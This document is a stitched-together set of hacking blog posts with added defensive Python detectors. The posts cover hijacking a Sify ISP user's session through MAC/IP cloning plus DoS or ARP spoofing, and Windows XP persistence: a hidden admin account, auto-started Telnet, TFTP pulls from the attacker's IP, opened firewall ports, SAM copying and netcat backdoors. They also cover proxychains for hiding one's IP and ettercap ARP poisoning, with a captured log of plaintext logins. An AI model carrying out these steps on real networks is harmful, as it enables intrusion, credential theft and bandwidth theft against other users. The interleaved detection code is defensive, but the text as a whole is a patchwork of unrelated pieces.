The level of insecurity in Sify's network continues to amaze me. Maybe it's just the flawed LAN-style network design they use, maybe it's the equipment or software... whatever.

Anyhow, I've found another way to exploit Sify networks. Well, it's not really a new exploit; attacks like this are not new. A successful attack gives you free internet at the expense of some poor soul who happens to be on the same network as you.

I'll not post complete details, only a bit of an outline. Considering the number of script kiddies who are likely to use this simple exploit and misuse the bandwidth of other Sify users, I think that's a fair idea.

First, run a port scan and note down all the IPs and corresponding MAC addresses in your Sify network. Any moderately good port scanner can do it for you.

Second, choose one IP/MAC address combination of a user who is most likely logged in at that time and change your own IP and MAC address to the same values.

Third, use something to kick that user off the network temporarily. Do this quickly; it's one of the most vital steps. Hints: DoS, ARP spoof :p

Open your browser and start surfing, downloading, whatever. This attack works on almost every LAN, but I expected better from a national-level ISP.

Part 1

In this post I'll cover more things you can do to maintain access to a remote Windows XP computer. The previous post is here.


1. Creating Invisible Account

You can create a user "admin" by running the following command:

c:\windows\system32\net user admin admin /add

But this user will be visible on the XP logon screen. To hide it, you'll have to edit a registry setting.
Open Registry Editor and navigate to this key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Here, create (or modify) a DWORD value by right-clicking in the right-hand pane and choosing New DWORD Value. The name of the value must be the same as the account name you want to hide (admin here). Set the value data to 0 to hide the account and to 1 to unhide it.

2. Enabling Telnet

Telnet is one simple utility you can use to maintain access without uploading any extra backdoor or software. The Telnet server is disabled on most PCs by default, so you'll have to enable the service manually and set it to start automatically:

sc config telnet start= auto
net start telnet

That's it. Any service can be enabled with this command; just replace telnet with the service of your choice.
Now you can use the account you created earlier to log in any time you want.
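Both of these tricks leave state that a local audit can check: a DWORD of 0 under the SpecialAccounts\UserList key for a name nobody expects, and a Telnet service whose start type has become AUTO_START. As an added example that is not part of the original post, the Python below parses constructed "reg query" and "sc qc" output for exactly those two signs; the allowlist of accounts Windows itself hides is an assumption, and the sample outputs are made up so that both checks fire.

```python
import re

# Constructed sample output (not a real capture) of:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    admin            REG_DWORD    0x0
    HelpAssistant    REG_DWORD    0x0
    backup           REG_DWORD    0x1
"""

# Constructed sample output (not a real capture) of:  sc qc telnet
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: telnet
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\system32\tlntsvr.exe
"""

# Accounts Windows XP hides from the logon screen on its own (assumed allowlist);
# any other name under UserList with value 0 deserves a look.
KNOWN_HIDDEN = {"HelpAssistant", "SUPPORT_388945a0"}

DWORD_LINE = re.compile(r"^[ \t]+(\S+)[ \t]+REG_DWORD[ \t]+0x([0-9a-fA-F]+)[ \t]*$", re.M)


def hidden_accounts(reg_output):
    """Names listed under UserList with a DWORD value of 0 (hidden from logon)."""
    return [name for name, value in DWORD_LINE.findall(reg_output) if int(value, 16) == 0]


def service_start_type(sc_output):
    """The START_TYPE label (AUTO_START, DEMAND_START, DISABLED, ...) from 'sc qc'."""
    m = re.search(r"START_TYPE\s*:\s*\d+\s+(\S+)", sc_output)
    return m.group(1) if m else None


def audit(reg_output, sc_output, service="telnet"):
    """Findings a local audit should raise for the two persistence tricks above."""
    findings = [f"hidden logon account: {n}" for n in hidden_accounts(reg_output)
                if n not in KNOWN_HIDDEN]
    if service_start_type(sc_output) == "AUTO_START":
        findings.append(f"service {service} is set to start automatically")
    return findings


if __name__ == "__main__":
    for finding in audit(REG_QUERY_OUTPUT, SC_QC_OUTPUT):
        print("FINDING:", finding)
```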

In this post I'll write about what to do once you gain administrative privileges on a Windows PC. There's a lot you can do, depending on your inclinations (I hope benign).
Don't ask me how to get admin rights in the first place. Figure that out yourself.
Maybe I'll write something on that someday, but not now.

Anyhow, once you get in, open a Windows command shell.
Here are a few things you might like to do:

1. Uploading/downloading files

The first thing you might do is upload a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start the tftp service/daemon on your PC first and place the files you want to upload in the program's working directory. On most Linux distributions it's /tmp.

Type the following command to upload the netsh.exe file:

C:\WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here:

-i specifies binary transfer mode

GET tells the victim PC to fetch the file from the remote PC. You can use PUT to copy data onto a remote PC

192.168.1.10 is your IP

The first netsh.exe is the file you want to upload

The second netsh.exe is the filename to keep on the victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing network-related settings of a PC. Most XP PCs don't have it by default, so you'll have to upload it. In this case it's used to open certain ports in Windows Firewall that could otherwise be blocked. VNC uses ports 5900 and 5800 for communication. You can edit the firewall settings to unblock these ports with these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind that unblocking a particular port doesn't mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet is of no use unless the telnet service is started on that PC.

3. Copying the SAM

The SAM file contains the list of all users and their corresponding passwords (in encrypted form) in Windows. Though its encryption can be hard to break depending on password strength, it's a very juicy target. There are quite a few paid and free programs that can do that. Its default location is

C:\windows\system32\config

It's not possible to copy the SAM file directly, as it's a protected system file. But there is a loophole here too. A backup copy of the SAM is almost always located in

C:\windows\repair

Unlike the original SAM, you can copy this file to your own PC.

4. Uploading a back-door

A back-door program such as netcat is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily, so it's slightly out of fashion. If that's the case, you can try a script-based back-door like Matahari. It's a Perl script; the only downside is that the target PC needs Perl installed, which most Windows PCs don't have.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.
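Every step in this post is a distinct command line, which is exactly what a process-creation log records, so the same walkthrough doubles as a detection checklist. As an added example that is not from the original post, here is a small Python rule set that flags the net user /add, sc config start= auto, tftp GET, netsh firewall set portopening and repair\sam patterns over constructed events; the regexes and the events are assumptions made up for this illustration, not a vendor rule set.

```python
import re

# Detection rules for the post-compromise commands walked through above.
# The patterns are assumptions written for this example, not a vendor rule set.
RULES = [
    (re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I), "local account created"),
    (re.compile(r"\bsc(?:\.exe)?\s+config\s+\S+\s+start=\s*auto\b", re.I), "service set to auto-start"),
    (re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?\S+\s+get\s+", re.I), "file pulled in over TFTP"),
    (re.compile(r"\bnetsh(?:\.exe)?\s+firewall\s+set\s+portopening\b", re.I), "firewall port opened"),
    (re.compile(r"\\repair\\sam\b", re.I), "SAM backup copy accessed"),
]

# Constructed sample process-creation events (timestamp, user, command line);
# the SYSTEM-context entries replay the commands from this post.
EVENTS = [
    ("09:01", r"CORP\alice", r"notepad.exe C:\notes.txt"),
    ("09:02", r"NT AUTHORITY\SYSTEM", "net user admin admin /add"),
    ("09:02", r"NT AUTHORITY\SYSTEM", "sc config telnet start= auto"),
    ("09:03", r"NT AUTHORITY\SYSTEM", "tftp -i 192.168.1.10 GET netsh.exe netsh.exe"),
    ("09:03", r"NT AUTHORITY\SYSTEM", "netsh firewall set portopening tcp 5900"),
    ("09:04", r"NT AUTHORITY\SYSTEM", r"copy C:\windows\repair\sam C:\temp\s.bak"),
    ("09:05", r"CORP\bob", "ping 10.0.0.1"),
]


def classify(cmdline):
    """Labels of every rule that matches one command line (empty if nothing fires)."""
    return [label for pattern, label in RULES if pattern.search(cmdline)]


def scan(events):
    """(timestamp, user, label) for each rule hit, in event order."""
    return [(ts, user, label) for ts, user, cmd in events for label in classify(cmd)]


if __name__ == "__main__":
    for ts, user, label in scan(EVENTS):
        print(f"{ts} {user}: {label}")
```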


There are probably dozens of programs on any OS that have no option for using proxies. Many common command-line tools like ping and traceroute don't work if the network you are on forces you to use a proxy. I finally found a way to specify a proxy for these programs. ProxyChains is one very good tool that lets you use a proxy not only to reach outside networks but also to route through anonymous proxies for your privacy.

It's quite simple to install and use. First download and install the script.

Then navigate to the /etc folder and open the proxychains.conf file in a text editor of your choice. It should look like this:

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests – no leak for DNS data
proxy_dns

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080 
#  
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
http 10.123.137.1 8080
socks4 111.44.45.31 80

Now, depending on your network configuration, you'll need to add proxies to this file. If you're on a network that routes all data through a proxy server, replace the first entry under [ProxyList] (http 10.123.137.1 8080 in the sample above) with the type of your proxy (http, socks4 or socks5), its IP address and its port number, separating each field with a TAB. That'll be enough to force your programs to use your network's proxy.

But if you want to use another proxy for any purpose, including hiding your IP, add further proxies with their type, address and port number in the same way (the second entry, socks4 111.44.45.31 80, in the sample). Additionally, you may have to add a username and password if the proxy server requires them.

Notice the options #dynamic_chain, #strict_chain and #random_chain.
Removing the # sign from one of these three specifies the order in which the proxies are used; leave only one of them uncommented, as the comment in the file says. In this example I'm using the strict_chain option, though dynamic_chain will also work.

Save the file and exit the text editor. Now it's time to see it in action. Open a command line and type proxychains before the program name to force it to use your ProxyList.

user~# proxychains program

As simple as that :)
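The things that go wrong when editing this file are the ones the comments in it warn about: more than one chain mode uncommented, proxy_dns left commented out (so DNS lookups go around the proxy and leak), and a malformed ProxyList entry. As an added example, not part of the original post or of ProxyChains itself, this Python linter parses a proxychains.conf and reports each of those; the config it checks is constructed and deliberately broken.

```python
VALID_TYPES = {"http", "socks4", "socks5"}
CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain")

# Constructed test config (not the sample above): two chain modes left uncommented,
# proxy_dns still commented out, one bogus proxy type and one impossible port.
SAMPLE_CONF = """\
dynamic_chain
strict_chain
#proxy_dns
tcp_read_time_out 15000
[ProxyList]
http\t10.123.137.1\t8080
socks4 111.44.45.31 80
socks6 10.0.0.5 1080
http 10.0.0.6 99999
"""


def lint_proxychains(text):
    """Parse proxychains.conf text and return (settings, proxies, problems)."""
    settings = {"chain_modes": [], "proxy_dns": False}
    proxies, problems, in_list = [], [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
        elif not in_list:
            key = line.split()[0]
            if key in CHAIN_MODES:
                settings["chain_modes"].append(key)
            elif key == "proxy_dns":
                settings["proxy_dns"] = True
        else:
            fields = line.split()  # tab- or blank-separated: type host port [user pass]
            if len(fields) not in (3, 5):
                problems.append(f"line {lineno}: expected 'type host port [user pass]'")
                continue
            ptype, host, port = fields[:3]
            if ptype not in VALID_TYPES:
                problems.append(f"line {lineno}: unknown proxy type {ptype!r}")
            if not (port.isdigit() and 1 <= int(port) <= 65535):
                problems.append(f"line {lineno}: bad port {port!r}")
            proxies.append({"type": ptype, "host": host, "port": port, "auth": len(fields) == 5})
    if len(settings["chain_modes"]) != 1:
        problems.append(f"exactly one chain mode expected, found {settings['chain_modes']}")
    if not settings["proxy_dns"]:
        problems.append("proxy_dns is commented out: DNS lookups will go around the proxy (leak)")
    return settings, proxies, problems
```

Calling lint_proxychains(SAMPLE_CONF)[2] lists the four problems in the constructed file; a clean file returns an empty list.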

This is probably the easiest way to "hack" various passwords, including email. All you need is ettercap.
It's an easy-to-use GUI-based sniffer (good news for people scared of the command line).
Download and install the software on your PC from this link. Only source packages are available. Instructions for running it on Windows are here. I've not tried that yet.
For this hack to work, your PC needs to be on the network. You can't do it from outside.

First click Sniff -> Unified Sniffing.

Then click Hosts and input the list of hosts you want to snoop on. You can either feed it a list of IPs or let ettercap select the online hosts in your subnet. I tried sniffing hosts outside my subnet (there is a reason I had this idea of sniffing) but that hasn't worked well yet.

Click Mitm (for newbies, MITM stands for Man In The Middle) and then ARP poisoning. In the next box, select Sniff remote connections.

Click Start -> Start Sniffing.

Now keep an eye on the output screen as users log in to websites. Their login details are displayed in plain text. :D

In case you don't see anything, you may need to do a bit of work. Find the file ettercap.conf and remove the # sign from the last two lines shown below.

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport $
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport$

The ettercap.conf file is located in /usr/local/etc.

Here is a sample of what I captured on one of my networks. Details have been changed to protect the innocent. :P

Listening on eth0… (Ethernet)

eth0 -> 00:A2:81:99:BA:01 10.17.167.60 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
26 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

HTTP : 10.17.167.24:8080 -> USER: a23bb2-dc2d-4435-be54-cbf8a64431cb PASS: HTRnheQp INFO: http://online.speedbit.com/online/update.aspx?CV=1.1.0.6&
DHCP: [00:0D:60:9F:10:0E] REQUEST 10.17.167.188
DHCP: [10.17.167.1] ACK : 10.17.167.188 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “smtup.com”
POP : 10.17.166.21:110 -> USER: user.one PASS: mypass1234
HTTP : 116.143.123.122:80 -> USER: 4f3ab8b2-dc2d-c245-a654-0ca8a64431cb PASS: nRHh6Pq INFO: online.speedbit.com/
DHCP: [10.17.167.1] ACK : 10.17.167.169 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “mydomain.com”
HTTP : 202.137.234.20:80 -> USER: mantris PASS: yourpass INFO: http://www.rediff.com
DHCP: [00:23:E6:1B:FD:7F] REQUEST 10.17.16.69
DHCP: [10.17.16.1] ACK : 10.17.167.69 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.3 “mydomain.com”
HTTP : 10.17.16.24:8080 -> USER: kaykay PASS: batman INFO: http://www.rediff.com/index.html

Do not misuse this information. I use this tool only to monitor traffic for illegal activities on my network.

Greets: remote-exploit.org
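The ARP poisoning step in this walkthrough, and the ARP-spoof "kick-off" hint in the Sify post at the top of the page, leave the same trace on the wire: an IP whose MAC changes, and one MAC that suddenly answers for several IPs. As an added example that is not part of the original post, the Python below flags both patterns over constructed tcpdump-style ARP replies; the hosts, MACs and timestamps are made up, and the optional trusted seed (the gateway's known MAC) is an assumption of this example.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP reply lines (not a real capture). The gateway
# 10.17.167.1 first answers from one MAC, then a second MAC claims the gateway
# and two clients: the pattern ARP poisoning between victims and gateway produces.
ARP_LOG = """\
10:00:01.000 ARP, Reply 10.17.167.1 is-at 00:0d:60:9f:10:0e, length 28
10:00:02.000 ARP, Reply 10.17.167.24 is-at 00:23:e6:1b:fd:7f, length 28
10:00:05.000 ARP, Reply 10.17.167.1 is-at 00:a2:81:99:ba:01, length 28
10:00:05.100 ARP, Reply 10.17.167.24 is-at 00:a2:81:99:ba:01, length 28
10:00:09.000 ARP, Reply 10.17.167.60 is-at 00:a2:81:99:ba:01, length 28
"""

ARP_REPLY = re.compile(r"^(\S+) ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]{17})", re.I)


def detect_arp_spoofing(log, trusted=None):
    """Alerts for IP->MAC binding changes and for one MAC answering for several IPs.

    trusted: optional {ip: mac} bindings (e.g. the gateway) seeded before parsing,
    so the very first spoofed reply for a known host already counts as a change."""
    binding = dict(trusted or {})
    ips_by_mac = defaultdict(set)
    for ip, mac in binding.items():
        ips_by_mac[mac].add(ip)
    alerts = []
    for m in filter(None, map(ARP_REPLY.match, log.splitlines())):
        ts, ip, mac = m.group(1), m.group(2), m.group(3).lower()
        previous = binding.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"{ts} {ip} moved from {previous} to {mac}")
        binding[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                alerts.append(f"{ts} {mac} now answers for {sorted(ips_by_mac[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_LOG, trusted={"10.17.167.1": "00:0d:60:9f:10:0e"}):
        print("ALERT:", alert)
```

An IP that legitimately changes MAC (a DHCP reassignment, a replaced NIC) produces the same "moved" alert, so the trusted seed for the gateway and the multi-IP alert are what separate poisoning from ordinary churn.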